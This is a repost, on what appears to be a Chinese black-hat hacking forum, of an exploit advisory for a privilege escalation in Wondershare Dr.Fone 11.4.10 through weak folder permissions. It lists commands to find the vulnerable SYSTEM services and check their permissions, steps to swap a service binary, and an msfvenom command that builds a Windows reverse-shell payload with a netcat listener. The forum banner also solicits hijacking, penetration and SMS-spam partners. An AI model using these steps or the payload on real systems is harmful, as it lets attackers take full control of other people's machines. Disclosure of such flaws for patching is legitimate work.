跳转到帖子
诚邀seo站长,短信,劫持,渗透,代理,推广团队,博主,主播,各种资源流量大佬合作共赢【站外广告】

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Wondershare Dr.Fone 11.4.10 - Insecure File Permissions

CHT丨情报收集
CHT丨情报收集
黑帽漏洞数据库

精选回复

发布于 
# Exploit Title: Wondershare Dr.Fone 11.4.10 - Insecure File Permissions
# Date: 04/25/2022
# Exploit Author: AkuCyberSec (https://github.com/AkuCyberSec)
# Vendor Homepage: https://drfone.wondershare.com/
# Software Link: https://download.wondershare.com/drfone_full3360.exe
# Version: 11.4.10
# Tested on: Windows 10 64-bit

 # Note: The application folder "Wondershare Dr.Fone" may be different (e.g it will be "drfone" if we download the installer from the italian website)

 # Description:
 The application "Wondershare Dr. Fone" comes with 3 services: 
 1. DFWSIDService
 2. ElevationService
 3. Wondershare InstallAssist

 All the folders that contain the binaries for the services have weak permissions.
 These weak permissions allow any authenticated user to get SYSTEM privileges.

 First, we need to check if services are running using the following command:
 wmic service get name,displayname,pathname,startmode,startname,state | findstr /I wondershare

 Wondershare WSID help                     DFWSIDService               C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe                          Auto 	LocalSystem	Running  
 Wondershare Driver Install Service help   ElevationService            C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\Addins\SocialApps\ElevationService.exe	Auto 	LocalSystem     Running  
 Wondershare Install Assist Service        Wondershare InstallAssist	C:\ProgramData\Wondershare\Service\InstallAssistService.exe                                     Auto 	LocalSystem     Running  

 Now we need to check if we have enough privileges to replace the binaries:

 icacls "C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone"
 Everyone:(OI)(CI)(F) <= the first row tells us that Everyone has Full Access (F) on files (OI = Object Inherit) and folders (CI = Container Inherit)
 ...

 icacls "C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\Addins\SocialApps"
 Everyone:(I)(OI)(CI)(F) <= same here
 ...

 icacls "C:\ProgramData\Wondershare\Service"
 Everyone:(I)(OI)(CI)(F) <= and here
 ...


# Proof of Concept:
1. Create an exe file with the name of the binary we want to replace  (e.g. WsidService.exe if we want to exploit the service "Wondershare WSID help") 
2. Put it in the folder (e.g. C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\)
3. After replacing the binary, wait the next reboot (unless the service can be restarted manually)

As a proof of concept we can generate a simple reverse shell using msfvenom, and use netcat as the listener:
simple payload: msfvenom --payload windows/shell_reverse_tcp LHOST=<YOUR_IP_ADDRESS> LPORT=<YOUR_PORT> -f exe > WsidService.exe
listener: nc -nlvp <YOUR_PORT>

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。